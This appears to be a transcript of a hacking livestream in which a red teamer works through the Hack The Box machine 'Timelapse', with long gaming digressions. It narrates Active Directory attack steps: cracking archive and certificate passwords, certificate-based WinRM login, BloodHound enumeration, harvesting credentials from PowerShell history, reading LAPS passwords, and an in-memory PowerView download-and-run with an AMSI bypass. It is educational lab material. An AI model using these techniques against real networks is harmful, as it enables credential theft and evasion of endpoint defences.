hours, and we don't have a video from Critical on it yet. I'm over here just harvesting all your SMB commands. Like that's what the stream is for, my dude. See, this is why we keep OpenOffice. This is why we keep OpenOffice, because every so often I need a word processor and I don't want to fucking install it. So this is why we do this. Libre should work to open it. Yeah, Open or LibreOffice will probably work. But they both take forever to install is the problem. Let's look at dev first. WinRM backup. Unzip, WinRM backup. It does have it is encrypted, so we can do a zip to John. To get the hash, pass that into zip.hash, and then we can try to crack it. Literally the module I was doing last night. Supreme Legacy. A very strong password. What was the benefit of recurse on and prompt off? The reason I did that because I could just download all the files on the share immediately recursively without going into the directories and downloading each file individually and so on. Recurse makes it operate recursively, and prompt keeps it from asking me every single file if I want to download it. Just download all the files. See you, folks. Hey, thanks for being here, Frequency. So we do have Supreme Legacy, Unzip, WinRM backup, Supreme Legacy. Okay. So we do have a PFX file here. So this is an encryption. This is some kind of encryption legacy dev auth PFX. Are we gonna have to do some CS perhaps? Are we gonna have to do some ADCS? That would be spicy. ADCS, yeah. Active Directory Certificate Services. So the first thing we need to do is get the public and private key from this. This is like a PFX file is basically a bundled together public and private key. And you can use OpenSSL to extract it, but I don't remember how. OpenSSL. I don't think I've ever executed OpenSSL without looking up a command first. What is that music? Is it a public playlist? Yeah, it's the FTL soundtrack. I'll send you the exact playlist. In fact, I'll send you... I have a whole playlist on my YouTube of the songs that I use on stream. Usually it's FTL. Because I find the music very good. Okay. Certificate and private key. This looks fine. Take the file you exported. Okay. In. Legacy dev auth. So this is some kind of certificate that we're allowed to authenticate as. I'm assuming to WinRM because it says WinRM backup. Out key.pem. Enter import password supreme legacy. Damn it. Do I have to crack this too? I have to crack this too, I think. Sonic tunes don't leave me for weeks. Oh, dude, I fucking love those. Do we have a PFX to John? Is there one of those? PF, not a PFZ. PFX to John. We do. Legacy. Okay, so we'll output this pfx.hash. And we'll do the John thing again. Try and crack this. Okay. Damn, John has it all? It does. What does this mean? Yeah, I already answered that. Odin with the 8 months. I'm sorry to have to kill you in, I don't know, 3 weeks? In about 3 weeks. I'm sorry. I'm coming for you, Odin. I'm coming for you. Okay? In about 3 weeks. It's like a The Ring situation, but you have 3 weeks instead of 1. Listen, you guys are gonna hear about this more over the next 3 weeks because I'm basically collapsing in on myself with hype like a dying star. Did you guys see the story trailer for God of War Ragnarok? I mean, did you see this shit? Okay, while this is running. This is so awesome. Hang on a sec. We have to watch it. We have to watch it. I've watched it like 17 times. There's no spoilers. Nothing you wouldn't have already expected, anyway. Oh my god, I'm so excited. I love Norse mythology. Super excited to kill all of it.
Sometimes it's the only way to protect the ones we love. I know you.
This is a hacking stream, by the way. But I'm excited anyways. Listen, you're gonna have to hear about this a lot more. because I'm super fucking
Is it a
stoked.
god of war we came to find?
You don't really want war, do you, Kratos?
So that must be Odin.
All that blood on your hands.
This must be Odin
Your
talking.
son's hands.
What is it you will not tell me?
I can't talk about it, but I just need you to trust
I
me.
love some of the quotes in this.
We follow your every whim,
But you don't believe in any of it.
and still I follow. Because all that matters is that you are safe.
Yeah, that's
But
the
that's not all
mistletoe
that
dart that
matters.
killed Balder.
Who's keeping you safe?
I do not need you to protect me.
You sure about that?
2 new Valkyries to fight. I think these are Harist and Mist.
Death can have
Yeah,
me.
it says it in the subtitles.
It earns me.
Badass. Yeah, this is still a hacking stream. He does use an axe. Technically, we are still hacking.
In your lifetimes, has anyone ever?
I think these are the Einherjar. I think these enemies he's fighting are the Einherjar,
Can you even imagine?
which means that's probably
kind of love?
Asgard.
No. You don't care about anything beyond yourself. Beyond the monster who kills without cause.
Yeah, it is slightly cut off on the right side. I need to resize it, honestly. That's Skull and Hottie. The one on the left must be Skull,
Fate only
and the one on
binds
the
when
right
you
is
let
Hottie.
it.
The wolves that oh no, the one on the right is Skull. My bad. Skull and Hottie are the wolves that chase the sun and
It's
moon.
necessary. Not because it is written.
Oh my god, I'm so excited. I'm so fucking excited to fight
We'll
Thor.
make our own destiny.
I'm so fucking excited to fight Thor. Oh my god, I'm so sorry. We had to do that. I'm just stoked, okay? We had to wait for this anyways. Thor was fat. He looks solid, okay? He doesn't there was a huge controversy when they released Thor's design. They released an idea that's just how a strongman looks. You ever seen people lift like 500 pounds in the gym? Well, you've never been in the gym. Ragev has definitely never been in the gym, first of all, okay? But let's think hypothetically. You were in a gym. Do you think you'd see do you think that everyone in there would be like a super fucking jacked person? A super fucking like a super cut like magazine model? Fuck no. The dudes who are lifting like 600 pounds with squats they look like Thor, okay? They look like Thor. So don't even fucking start, okay? Don't even fucking start. Let's just see an image so that we can compare. Oh my god, can I just see an image? IGN, do you have to can it not be in like a fucking slideshow? Okay, here we go. So this is Thor in the new God of War. Anyone who's ever actually been in a gym, like in their life, will know that the strongest guys all look like this. Okay? The strongest guys all look like this. Okay? This fucking guy can probably lift like 1 million pounds. Okay? Like 100 million pounds. The armor does not make sense. It does not. No one is arguing that the armor makes any sense. Okay? But my point is that there are plenty of super fucking strong guys that look like this. So having Thor look like this, I think, is entirely appropriate. The guy basically drinks and fights. That's all he does. Anyway, okay, all right, we got to move on with this. Okay, sorry about that. That was a digression. I only did that because don't skip abs day. Oh my god. Tell me you've never worked out without telling me you've never worked out. You don't get a six-pack by doing abs. I'm tired of educating people on how working out works. No, you didn't, Superpower. No, you didn't. You might think you did a lot of sit-ups and got a six-pack. That is not how it works. The abs already look like that. Everyone listening has a six-pack. It's just probably underneath a bunch of fat. So you have to remove fat, not do a lot of sit-ups. You just need to remove the fat on top of them. Actually, I am low in fat. I'm quite sure you are. That's why you can see your abs. Thor is unable to do one single sit-up? Yes, I guarantee you he can do more sit-ups than you, Ragav. I guarantee you he can do more sit-ups than you. We'll get no keys out, cert pot pound. I'm sure there's a command to do this all at once. I don't really care. Thug Legacy. There we go. Okay. So we do have a certificate. Did we not get a key? We have a certificate. I guess we didn't get a key? Or no, we did get a key. Oh, I just overwrote it. I'm an idiot. Damn it. All right, let's do no certs, cert, key.pem. Thug Legacy. Okay. And then no keys, cert.pem. We need the certificate and the private key in order to use it. Sorry, I'm thinking about fighting Thor again, and I'm super fucking hyped to fight Thor. What OS are you using? This is Kali Linux. Okay. All right, so we have a cert.pem and we have a key.pem. So let's cat key.pem. It's just going to be a standard RSA private key, or RSA looking private key right here. Pretty normal stuff. And we have a certificate here as well. Let's see what we have in the help desk folder. Open. Okay, so who knows what Lapse is? Thor is nothing without his hammer? Oh, I disagree with that wholeheartedly. That guy looks strong as fuck. That guy looks strong as fuck. Literally anyone who has ever been in a gym, okay, knows that the real strong men look that way. They're the guys who wear, like, hoodies. They wear, like, hoodies so you can't see how fat they are underneath. But, like, they're fucking huge, okay? They're fucking huge. It's used to protect the admin user. Yeah, so LAP stands for local all the strongest men in the world look just like that. Exactly. Can you see visible abs on the mountain? Like, the mountain isn't fat by any stretch. What's his name? What's the guy who played the mountain in Game of Thrones?
Right now, if you want to test it, we'll flip your Kali desktop interface to look kinda like Windows and use Windows.
Yeah, I have used that before, OreoBite. It's pretty cool. I'm not going to do it right now because I don't know how to reverse it. Odin with the 8 months. Welcome back. Ali and Hammond Comey. Thank you for the follow. Half-Thor, whatever his fucking name is, okay? Half-Thor. Half-Thor Bjornsson, whatever his name is. That guy, he definitely doesn't look like, he doesn't have a six-pack, that's for fucking sure. And that guy's one of the strongest people who ever lived in the history of mankind. He's like a 7 foot tall, like, fucking Norse god in and of himself. And, like, literally watch any strongman competition and tell me if they look more similar to a magazine model or more like Thor in God of War, okay? Literally any strongman competition, okay? And I guarantee you, you're going to see like 50 Thors. I guarantee you. Because that's just how they look, okay? Because at the lower body fat you have, the harder it is to retain muscle. If all you want is muscle, if you just want to put on as much muscle as possible, you're going to be at high body fat. Because that way, your body's going to burn fat instead of muscle for energy. This is just how biology works. This is straight up just biology, like, friends, okay? Let's open
hey,
Lapse
hey,
datasheet.
listen.
So, local admin password solution, or Lapse, is a relatively secure way of managing the local password on Linux, or not on Windows. Local admin password. So every machine has to have a local admin password, and using Lapse, you can automatically produce a randomly generated password and change it. That changes every so often. And only certain people in the domain will be able to access the passwords. Okay, yes. Solution automatically manages local admin password on domain joined computers, unique on each managed computer, randomly generated and securely stored. Lapse is the recommended way the way that I recommend to my clients to handle local admin passwords. Core of the solution is GPO. Yeah, Lapse is implemented via GPO, a group policy object. Reports the password to Active Directory, storing it in a confidential attribute within the computer account. Reports the next expiration time. Password can be read from AD by users who are allowed to do so. Password can be forced to be changed by eligible users. Okay, so this is just information on Lapse. Let's do Lapse operations guide. This is just a fact stream? It is. It is. I'm sorry. Anyone who's worked out for any length of time knows how this knows what strength looks like, and it looks like Thor in God of War. Okay, just because he doesn't look like a fucking magazine model doesn't. He looks way better to me than if he looked like a magazine model. Honestly, 1.25. It was not. This is false, Hubster. This is false.
Must hunt.
We also lost a lot of time on doing part of the first machine. Yeah, Giga Chad Thor, exactly. If I don't get to use Mjolnir in that game, I'm gonna be super fucking pissed. I better get to use Mjolnir as a weapon. I am gonna be omega pissed if I kill Thor and I don't get to use Mjolnir afterwards. I am gonna be hyper giga omega pissed. Okay, there are two parts in the... Okay, I don't think we need to know how to install it. Won't be able to pick it up. Listen, Thor is a massive piece of shit. And first of all, that whole thing of only being able to pick up Mjolnir if you're worthy, that's not a thing in God of War, okay? At one point, another character steals Thor's... not really a character, but a story is told where one character stole Thor's hammer for a while and, like, ransomed it back to him. And then he immediately got his forehead caved in by a big lightning hammer. So he didn't really think that one through. He did not really think that one through, in fairness. But Thor in God of War is an absolutely massive piece of shit. Is an absolutely massive piece of garbage. So, they spent the whole first game hyping him up. You only see him at the very end, and only for like a nanosecond. But they talk about him constantly, and about what a massive piece of shit he is. I'm not going to spoil anything if you haven't played the original game. You should play the original game. If you have a PC or a PlayStation, it's on PC now. You should play the original, the God of War 2018. It was so fucking good. I have my gripes with it. It's not a perfect game, but it's definitely very, very good. The story is absolutely excellent. I love the story and how they've adapted Norse mythology to suit the... Okay, I'm assuming this is all the technical stuff for Lapse. So, I don't care. Let's just try to... let's authenticate to WinRM if we can. So, we could do a certificate-based authentication. So it looks like there is some kind of ADCS here. There is some kind of ADCS happening. At least AD, Active Directory Certificate Services, is enabled. We may or may not have to... exploit it. Can we do evil WinRM with a certificate? Path to private key certificate. It looks like we can. Instead of hacking, I'm just talking about God of War today. I'm sorry, you're gonna this is gonna be the thing for the rest of the fucking until November 9th. This is what you're gonna be hearing about, okay? God, I'm super again, did you see the trailer we just watched? I'm super fucking hyped. I wanna fight Thor now, today. Like, if God of War Ragnarok came out right now, I'd go and immediately play it. I would just drop you guys immediately. I don't care about you guys. Thor is there. I have to kill him, okay? I didn't see the trailer. Yeah, we and Odin too. And we kill the entire pantheon, okay? I thought about maybe streaming the game. I'm on the fence, because I know you guys would like to watch it. Screw League, just God of War. I know you guys want to see God of War. Or at least some of you do. I'm thinking about doing it. It might be something I want to do on my own. We'll see. We'll see. If you guys really want to see it, then say so, and I'll really strongly consider it. I need to figure out how to. I need to get a capture card for the PS5. I have a PS5 to play it on, as well as some League. I do still need to do the League. The thing is, like, I'm trying to organize it with my brother, we were gonna try and make it work this week, and then I ended up working all week and having a job interview, and it just didn't work out. Those God of War games look awesome. I don't like the old God of War games. I haven't actually played God of War 1 through 3. Any of the God of Wars before he was in Midgard. I haven't played any of the God of Wars before 2018. I've seen them all played. I know the whole story. I've seen all the cutscenes. I've watched like a cutscene compilation of all of the games, so I know the whole story. But they're not the type of game that I really typically like. So I have not played them. The sort of reboot. So we have the public key. We have a private key. Do we have a certificate? Oh, this is a certificate. Okay, so how do we do this? Okay, evil, WinRM, attack I, 10, 10, 11. Is it 152? What is it? I played God of War when I was like 12. The old games are like, if you like them, I don't want to bash them for you. I don't want to bash them for you, but the old games, there's just stuff about them that bother me. Okay, which user do we think this is? Is it like SVC deploy? Which user do we authenticate as? What do you guys think? I hold off on playing on a new one because I wasn't interested in the original 3. Oh, the new one is so different. It's so different. It's much moodier, more adult. And it's not really it's not like a hack and slash like the original one was. I deeply recommend the new one. Oh, it's Legacy. Oh, it does say Legacy there, doesn't it? It does say that. You're right. You're absolutely right. So we'll do Legacy. I've never authenticated. It does say Legacy. I've never authenticated to WinRM with a certificate before, so we're playing it by ear here. So we got a public key certificate. So maybe we'll do attack C, cert.pem, and attack K, key.pem. Let's see if that does it. Password is a required option. Okay, so how do I put no password? Enable SSL? I mean, I guess we can do that. I don't think it matters. Does that help? Well, it's not erroring out, so apparently it did. Okay, well, thanks. So why did that work? So why did it work by just enabling SSL? That's very strange. Okay, but we...
Hackerman.
I'm in. All right, there we go. So we're in with a certificate. I don't know why I LS Tech LA'd. It's DUR. Not door. Okay, let's just do GCI. Oh my god. Maybe the cert stuff relies on... yeah, it could be. I've never used Evil WinRM for that. I confess. Unfortunately, I don't think you can use certificates with Bloodhound, at least not Bloodhound Python, but we could upload Sharphound to the box and run it. Okay, let's go back up to Legacy. GCI, TAC, Recurse. Okay, we do have a user.txt. Okay, so we do have a user.txt. Congratulations, everybody. We finally got there after talking about God of War for like a million years. We finally got to and Amaranth and God of War. This was an Amaranth and God of War stream. Okay, it was just user.txt. All right, what other users are? Let's look at the users. Let's look at this. The root folder, then we'll look at the users folder. Users. SVC deploy. So we... Can we use Certify to authenticate with a certificate, or is it just for pulling a certificate? I have to imagine we can use a certificate to authenticate to it. TBF should be aliased in PowerShell. What is TBF? To be fair. Net user. Okay. So we get permission denied a bunch of times. Okay. So... They mentioned lapse. I should have done whoami/all. Let's do net group /domain. So typically the way lapse is implemented is that there's a group with the GPO permission. Lapse readers. So we have a lapse readers group. Why don't we just upload Sharphound here? Let's do get process. Is Windows Defender present? Let's look for MSMPENG. We do see MSMPENG. But it is possible that it's not working. See if I have write access to this folder. Okay, we do have write access. Let's go ahead and upload Sharphound. Let's go to Sharp Collection. Amaranth is a perfect example for not judging people based on appearances. I mean, I don't really know anything about the woman in real life, so I don't, but yeah, sure. She does a thing online, and you certainly should not judge her for doing a thing online. The question is, what version of the .NET framework is this? We could probably check the .NET framework version, the .NET framework folder. I think it's... there's probably a registry key or something. Yeah, there's a registry key. Okay. I don't want to use File Explorer. Registry. Okay, let's see if there's just version 4. There should be. Okay, reg, query. We might not be able to, but we're going to try it anyways. HKLM, software, Microsoft, net framework, setup. NDP v4. That did not give me all the information I was hoping. Let's try... Need the /s. Did I not put /s? Is there a /s? Oh, there is a /s. I can't... Attention to detail, kids. Attention to detail. Okay, we do have .NET Framework. We have it up to 4.7. I just want to make sure I do the correct one. We're going to assume 64-bit. Sharphound. Download. Okay. Downloads sharphound.exe to see Windows tasks sh.exe. See if we can get Sharphound to work here. Yeah, well, it's uploading, so that's good news. She revealed that she has a husband. Oh, you mean, we talked about that at the beginning of the stream. If you weren't here at the beginning of the stream, Fantasy, we talked about Amaranth at the beginning of the stream. Yeah, I'm waiting for the Critical take on it. Critical still has not released a video. Still hasn't released a video. He's slow on this one, dude. Off day for him. That dude is done for. Like, what do you think Amaranth's gonna send her squad of trained ninjas after him? No, it's not. I mean, there's just drama unfolding, okay? There's just drama unfolding. It's just drama. I just ask that you be respectful to Amaranth. Abuse is not funny. What's happening to her is not funny, and it's not deserved. Regardless of how you feel about her, even if she's the worst person ever, she doesn't deserve to be treated this way by her own husband. So I just ask that you be respectful. It doesn't really matter if she's a good person in real life or not. She doesn't deserve this treatment. You use Bloodhound Python on mission? Yes, usually yes, yeah. Through a proxy. Sharphound.exe. Attack DC. We're not going to do DC only. We'll do attacks. Attack C all. Okay. So we've got Sharp Hound running here. Yes, I use Bloodhound Python. Mojito Breakfast, good to see you. Nice emotes, my friend. By the way, I got new emotes coming. I'm getting them worked on. Okay, it's doing the thing. Let's go ahead and start Bloodhound because Bloodhound takes a minute. Sudo neo4j console. We're primarily interested in that Lapse users group. Chad B. New bringing Angel D into the cult. Welcome, my friend. Medikin with the 9 months. Welcome back, my friend. Ed, Son, LP, and Mojito Breakfast. Thank you for the follows. Do you work with John Hammond? John is a friend, but he works for Hunt. We don't work for the same company, no. But John is a friend. Of mine. What do you do for a living? I am a professional red teamer. I'm a consultant. People hire me to hack them. Companies hire me to hack them and expose their vulnerabilities. That's my full-time job anyway. I teach you guys how to do this stuff on Twitch. Like the real dark magics of hacking. Gives video game reviews on Twitch. I have not given a single video game review. I told you about one while John the Ripper was cracking a password. I told you about one video game I'm excited about. Like, seriously, one time. This is the first time we've ever talked about a video game ever, okay? Please don't check any of the VODs. Okay, so we have Bloodhound data now. By the way, your tweets are amazing. I'm glad you like them. I'm trying to do one a day. Just little tidbits to help you get a little smarter, realize what's possible from the command line. Yeah, like little hacking related tips every day on Twitter. So I'm hoping you're enjoying those. So let's dir. So we've got. Did we not get it? God damn it! Every time with this. When did WinRM become so stupid? Have you tried Rust Hound yet? God, no, I have not tried Rust Hound yet. My question is it which versions of Bloodhound does it work with? Because Bloodhound is super sensitive about the version of its ingester. Is there a book on rolling your own crypto, not money? I would not roll your own crypto ever. You should. Oh, wait, there's a reason that crypto libraries exist and stuff. Like, when you're implementing crypto, the key to rolling your own crypto is to not do it. God damn it, I did it again. Okay, Alhazred, HacktheBox, Timelapse, Bloodhound.zip. For some reason, Evil WinRM wants full file paths. Why ever roll your own crypto? People do it sometimes because they're afraid of using public libraries, or because they're not aware that the public libraries exist, or they don't know how to use them, or whatever. Don't do that. You should not do that, like, ever. Just don't. Because you're probably going to fuck it up. Cryptography is complicated. You're probably going to fuck it up, and then you have a real problem. If someone breaks your encryption. Unzip bloodhound.zip. Alright, so we have some bloodhound data here. We can cut this in half. Bloodhound. I think I used that password for Bloodhound. To be fair, Rust tools are fast. I'm less concerned on a red team engagement. I'm not concerned about it running quickly. I'm concerned about it working. And whether it's going to get detected or not. It doesn't matter how fast something runs for me, if it gets detected. Let's clear the database. Okay, we'll upload this stuff to Bloodhound and see what we can find. We probably want to be paying the most attention to that lapse group. We can probably my guess is that the route is going to involve getting that lapse, getting access to that lapse group. What was this box called again? Timelapse. Just select all of those. Uploading the data. Regarding crypto, what do you recommend to start with? Pentester Lab is great. Look up Pentester Lab. Pentester Lab has some fantastic challenges that involve that come with built-in walkthroughs for various weaknesses that can exist in cryptographic systems. Okay. So let's see. Let's search for a node legacy. Legacy. I like to mark this guy as owned. And let's look at the node info. Group memberships 3. Development. So this development group, does this have any permissions? Object controllers. No object control, unfortunately. So what I like to do is I like to first look at my node, like whatever users I own, and see what permissions they have. This is just where I like to start in parsing Bloodhound data. Do we have any other interesting groups? Remote management users, this is how we can win RM. Domain users, authenticated users. Okay. Now, what about that lapse group? I do not see... Oh, Timelapse. I'm an idiot. What was it called? The group? Was it Lapse? It was Lapse something. Lapse readers. Lapse readers. This is the group I think we want to focus on. Which users are a member of this group? Direct members. SVC deploy. So can we Kerberos this, I wonder? Can Certipy get a Kerberos ticket? I'm wondering. Is it even Kerberosable? Just because it has SVC in the name doesn't mean it's Kerberosable. Let's do analysis. All Kerberostable accounts. It is not Kerberostable. Okay. I just saw SVC and I was like, oh, it's got to have an SPN. So that dude is on our C users. Okay, let's take a look-see. Let's connect again. So we cannot Kerberost that account. dev. Okay. We need some way to get access to the SVC account. What was it? Service deploy? Was it SVC deploy? So this account has lapse access. Group delegated object control. Yeah, so lapse readers, which can read the lapse password of DC01. So you can see that read lapse password. Try to Kerberos KRBTGT. Yeah, that's not going to go very well for me. I could Kerberos it, but it wouldn't be very useful for me. For those who don't know, the KRBTGT is always Kerberosable. It always has an SPN. The problem is that the password is a ridiculous, randomly generated monstrosity that you're never going to be able to crack. It's like the password is literally like a 64-character hexadecimal randomly generated piece of garbage. You're never going to be able to crack that. Why am I not seeing the... I thought I had the always show... I have always display on here, and yet it's not displaying. Lapse readers, remote management users, and domain users. So not a whole lot going on here in Active Directory that I can see. This guy's a development user. Let's check his PowerShell history. If he's a developer, he probably uses PowerShell. That's always something to be aware of. CD app data. Where is the PowerShell history located? It's in like console history. The only reason I know to check it is because mine gets flagged by Windows Defender every so often. My own console history gets flagged by Windows Defender. Does Sharphound get past Defender by default? No. You will have to obfuscate it to get past Defender. It's an app data roaming Microsoft Windows PowerShell PS read line. This is where your PowerShell history is stored. It's the effect. It's similar to your Bash history on Linux. I had to add an exception in mine. Now there is a history here. God, I'm a big brain. Thank God I thought to check that. I'd have been stuck here for a while. There was another box that we didn't check that either. Ah, yes. A fine addition indeed.
A fine addition to my collection.
A fine addition to my collection. For SVC deploy, everything we need.
This is where the fun begins.
Just everything we need, just right there. Well, even if we could Kerberos this, we're definitely not cracking that. That is definitely not getting cracked. Not a chance is that getting cracked. Jesus. Okay, alright, so we can read the lapse password. So if you don't know how to read the lapse password, what do you do? In this situation, let's assume you don't know how to read the lapse password. What do you do?
A hunter must hunt.
What's the easiest way to find out? You Google. Okay, yeah, you could Google it, yes. But let's imagine that your internet is down. Your internet is down, but you can still connect to the domain. Listen, your internet is down. What are you doing? Ask you for fuck's sake. Your internet is down. Am I in the room with you, Vinyo? Am I in the room with you, Vinyo Janos? No one's answered. Does no one know? I've done it a million times. Call Al. Ask IPSec. Your internet is down. Poses Thor. How do I solve the box with the internet? Listen, you're thinking too much into this. It's not LSAS either. Not LSAS. No LSAS. Not CME. Although CME might have a module for it. Oh my god. You people are killing me. Does no one remember that you can do this? I swear to God, I'm the only one who knows. We go to lapse readers. We go to first degree object control. Read lapse password, and you right click on this and you go help. And then it's just gonna fucking tell you. Like Bloodhound will just tell you. Like, will just tell you how to do it. Very nice. So we are going to need power view, it looks like. Get domain object, first import power view into your agent session. Let's see if there's another way that doesn't involve me putting power view on the host. Let's check hack tricks. How was call Al wrong then? Because you have no network connectivity. You have no, your phone is blown up. Your phone was blown up by a leprechaun, okay? Oh no. Listen, I'm having a hard time, okay? Yells how to do it without Google, ends up Google. Fuck you. I told you. I just wanted to let you guys know that Bloodhound will tell you how to do it. All I'm telling you is that Bloodhound has answers for all of these things. You don't even need to Google it. You could download the lapse policy. Let's see if we have this commandlet on the target. Let's authenticate as SVC deploy. Deploy. And then the password. Or your Amaranth and your husband just threw your phone into the toilet. Yes. I guess if that's the way you want to think about it, John Doe Norris. Hey, listen. Whatever gets you to the finish line there, okay? Listen, I'm not kink shaming. Nobody kink shame Mr. John Doe Norris. He's being very raw in chat right now. I respect it. Please, no one kink shame him. He has a very specific fantasy regarding Amaranth and her husband throwing the phone into the her phone into the toilet. I might have been able to use that Bloodhound thing a few days. Dude, I use it all the time. This is like half of the way. This is like most of the way that I figure out how to exploit Active Directory stuff. I just right-click and have Bloodhound tell me how to fucking do it. What if he has a kink for being kink-shamed? Literally everyone always asks that every time we talk about kink-shaming. I'm not... listen, regardless, the chat isn't the place for that. If he wants to be kink-shamed somewhere else on his own time, as long as there's a safe word, by all means, go nuts, my dude. We're getting off... You guys tell me I get off topic, okay? No Limit Fitness and with the first time Prime. Bezos indoctrination into the cult. Welcome, my friend. Netrunner 0 with the 8 months of Prime. Welcome back. Hey, is this gonna fucking connect ever? Do I need to enable SSL? Is the SSL not working? Yeah, we had to do the TAC S, I guess. I guess we just really need that TAC S in this case. There we go. Yeah, we just really need that TAC S. Okay. So, we do have SVC deploy. SVC deploy can read the read the lapse password. So let's see if we have this commandlet. We do not have that commandlet. Let's just do the power view way. We'll do the power view way. That's fine. Okay, upload. I like to operate in C Windows tasks for two reasons. Number one, C Windows tasks is usually world writable. Usually all users can write to C Windows tasks. Secondly, C Windows tasks is whitelisted by the default app locker rules, so it gets past any it'll get past any default app locker protection. Okay, upload. Opt PowerShell. I think I have PowerView in there. PowerView.ps1 to see Windows. Evil WinRM can actually import modules from the local directory, but I don't feel like doing that. Actually, let me just show you how to do that really quickly. I always say I don't want to do that. Let me just show you how to do that really quick. So you just do scripts, opt or mount, PowerShell. That's where I keep my PowerShell stuff. Or it's opt. It's optional. PowerShell. And Evil WinRM will actually look in this directory for any scripts. So if we do import module PowerView.ps1, that did not go how I had hoped. Evil WinRM tac help. Did I do this right? Yeah, tac scripts, PowerShell scripts, local path. How does this work? It says file. I get that it says file not found. No valid module file was found. Just PowerView? Oh my god. No. Does it have to be? It doesn't have to be this. Just the name of the script? That sounds like it might be right. I almost never do this in real life. Okay, that seems to be working, I think. Steven, Usich Ivacho, Usi Suvacho, and Code Snake. Thanks for the follows, my friends. Why do you not normally do this in real life? Because because PowerShell is alerted on too much. So I try to avoid PowerShell unless I absolutely need it. Does Evil WinRM touch disk this way? I don't think so, no. I do not believe it touches disk this way. Why is this taking so long? I regret my life choices. Why is this taking so long? Kill it. Come on, dude. I hate that WinRM will not quit. Thank you. It does that all the time. It drives me nuts. Okay. I guess we can do like an IEX situation. We'll host it from a web server. Okay. Okay, so we'll do IEX, IWR, HTTP://10.10.1430. Use basic parsing. powerview.ps1. Okay. Okay, we get a hit at powerview.ps1. It's downloading it, and then it's going to load it into memory. So we'll be able to use the powerview commandlets. Oh, wow. Okay. Windows Defender did not catch... Interesting. So Windows Defender did not catch... did not catch Sharp Hound, but did catch this. Very strange. Very random question. What icon pack are you using on your box? Your file manager display? Just the default one. Whatever the default one is for KDE. This is just how KDE works. Wow, okay, so it doesn't want power view. I could obfuscate it. Maybe there's a different way that won't get caught. Is there a Python script that'll do it? Lapse dumper, perfect. So this is showing more real life tradecraft. In real life, you avoid in real life you would avoid running PowerShell on the host if you can avoid it at all. So a solution like this is vastly preferred in most scenarios. Looks pretty simple. Do we already have this? I think we may have already used this on something. CD opt. Do we have Lapse Dumper? We do have Lapse Toolkit. Lapse Toolkit.ps1. Cat readme.pmd. Functions in PowerShell that leverage PowerView. I wonder if it'll accept this. Let's try to pull this down. Lapse Toolkit.ps1. Maybe this won't get caught. It's great. So it's using code from PowerView, but it might not have any signatures if we're lucky. So let's see. Let's find out. If this doesn't work, we'll use the Python one. That's more similar to what real tradecraft is like. Rather than like using invoke obfuscation to obfuscate PowerView. Because PowerView is a very big script and it takes a little bit. Damn it. Okay, so it did have some... We'll just do the Lapse Dumper thing. Because again, this is more similar to actual tradecraft in real life. You avoid running stuff on the host if you can avoid it at all. Sudo git clone. Okay. Lapse Dumper. Lapse.py. Okay. So we do have an LDAP server. TACU is SVC. What is it called? We could also do an AMSI bypass. You're absolutely right. But again, you want to avoid running stuff on the host whenever you can. An AMSI bypass would probably do it. In fact, I can show that off right now just for kicks and gigs. For kicks and gigs, let's do an AMSI bypass. But again, I'm trying to show you guys real stuff. Like stuff I'd really do in real life. And in real life, unless I absolutely needed to, I would not do an AMSI. I would not be executing this stuff on the host. Which one is the one that currently works? This one. So this is a custom obfuscated AMSI bypass. You could also go to AMSI.fail. This is in my cheat sheet. There you go. So let's see if we can pull down Lapse Toolkit now. Let's try and pull down PowerView. This may actually not work because I'm not sure if a new version of PowerShell is running. I don't think it will. I think it will work. Powerview.ps1. There you go. So that time it works. So, yeah, this is super easy to do. Obviously, you could have done this, but I was trying to do something that's similar. We'll do it both ways, okay? We'll do it both ways. This is a version of the AMSI init failed AMSI bypass. If you Google AMSI init failed, you'll see the raw version of this bypass, and I've obfuscated it just by hex encoding the strings. That's it. I've just hex encoded the strings. You can also go to amsi.fail to get like procedurally generated versions. So you got like the reflection, the .NET reflection version, and you get like custom, and you can just copy this into the terminal and paste it. This one is in my cheat sheet, which is available on my Patreon if you're curious about that one. But I normally wouldn't do this. Yeah, exactly. This gets caught by EDR all the time. Okay. This gets caught by EDR literally constantly. So you want to avoid doing this kind of stuff if you can avoid it at any cost, which is why I'm trying to show you guys real tradecraft. Okay. Okay, all we need to do is this one. Okay, we just need this. We'll do it both ways. So this is how you do it if you bypass AMSI or obfuscated PowerView. Oh, I think I have to do... Producer Wolf with the raid, my friend. Thank you so much. Thank you so much for that raid. Get domain object. Does that have to be... Help. Import PowerView. What is Windows 1 here? I think we probably need to do DC1. Oh, we don't have, we put credential in there because I'm an idiot. And now we're stuck, right? God damn it. Evil WinRM is so frustrating. Like, I swear to God. Evil WinRM is such a frustrating tool sometimes. It will not quit. If it gets locked up like that, it just won't quit on you, for you. It'll just sit there for 1,000,000 years. Okay, let's try this one more time. Okay. PowerView. So I think we need to do the compute. I think the Windows 1 is supposed to be the computer object. So it's probably... So it's probably dco1.timelapse.htb, I would think. Get domain object lapse. Lapse. So there's Lapse Toolkit. Here's Lapse Dumper. CrackMap Exec can do it too. Big shock there. I'm looking for like the PowerView. So it wants the whole LDAP object. shout out. Hey, thanks for the raid, my man. Okay, this is the one situation where Bloodhound has given me information that I'm not really sure. And I'm not really sure how to make use of it. I know the computer is lapse enabled. There's like a million ways to do this, and I'm just really wrapped around the axle trying to get it. Here. Identity, computer ID. This is probably right. Let's try that. Identity is going to be, is it DC01? I put it in my notes. Timelapse, DC01. So it's dc01.timelapse.htb. Let's see if that does it. And there we go. So you can get it that way. You can get it using crackmap exec. SMB 10.10.11.152. TAC U. SVC deploy. TAC P. So when lapse is enabled, and you do see lapse fairly commonly these days, in robust environments you will see lapse. You need to find the groups that can read the lapse password and get into those groups to get the local admin passwords. TAC lapse. Access denied. I am confused. Did I copy the password correctly? Okay, I have to specify KDC host, I think. Yeah, I have to do KDC host. KDC host dc01.timelapse.htb. TAC lapse. Access denied still. This KDC host parameter appears to just be bugged in crackmap exec because it just doesn't work. TAC M lapse. TAC M. So it's a module. Module not found. So it looks like defeating lapse crackmap exec. Yeah, no, I had it right the first time because I'm pretty sure I've done it this way. So it's crackmap exec LDAP. Let's just do this. Let's do sudo vim etc hosts. Let's put the 10.10.11.152 dc01.timelapse.htb dc01 okay. Crack map exec. Let's do the LDAP module. Or not, let's just do LDAP connection. It's a DC01. Let's specify the host name. Okay. And then Tac-Tac-Lapse. Or maybe it needs to be SMB. Shit. We'll do Tac-M-Lapse. We'll try that first. Because this is straight from the documentation. This never works. Like seriously, this KDC host is so bugged. It never knows. I almost want to submit a pull request and just fix it myself. Jesus fucking Christ. I run into this KDC host thing every single time. Well, at least we get a no such object. Okay, let's do SMB then. I swear to 